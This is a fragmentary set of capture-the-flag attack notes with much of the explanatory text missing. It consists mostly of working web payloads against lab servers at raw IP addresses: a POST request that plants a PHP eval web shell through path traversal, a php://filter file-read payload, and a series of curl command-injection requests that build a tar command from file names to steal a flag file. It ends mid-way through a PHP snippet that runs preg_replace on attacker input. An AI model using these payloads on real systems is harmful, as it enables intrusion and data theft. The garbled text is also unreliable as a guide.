orangessrf
5waf.php,waf
tar5.1G orzzzzzzzz
0.0
http://47.104.156.32:20007/index.php?page=123&id=1a9
shell:
POST http://47.104.156.32:20007/index.php?page=123&id=1a9
DATA: file=../hh.php/.&con=<?php @eval($_POST[dlive]);?>
php
http://47.104.74.209:20005/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
# find />x xx
flag.phpweb
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>find
curl http://47.104.166.183:20008/getflag.php?dir=test&c=*%20/>x
curl http://47.104.166.183:20008/getflag.php?dir=test&re=1
#/varflag.php
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>tar
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>zcf
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>zzz
curl http://47.104.166.183:20008/getflag.php?dir=test&c=*%20/v*
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();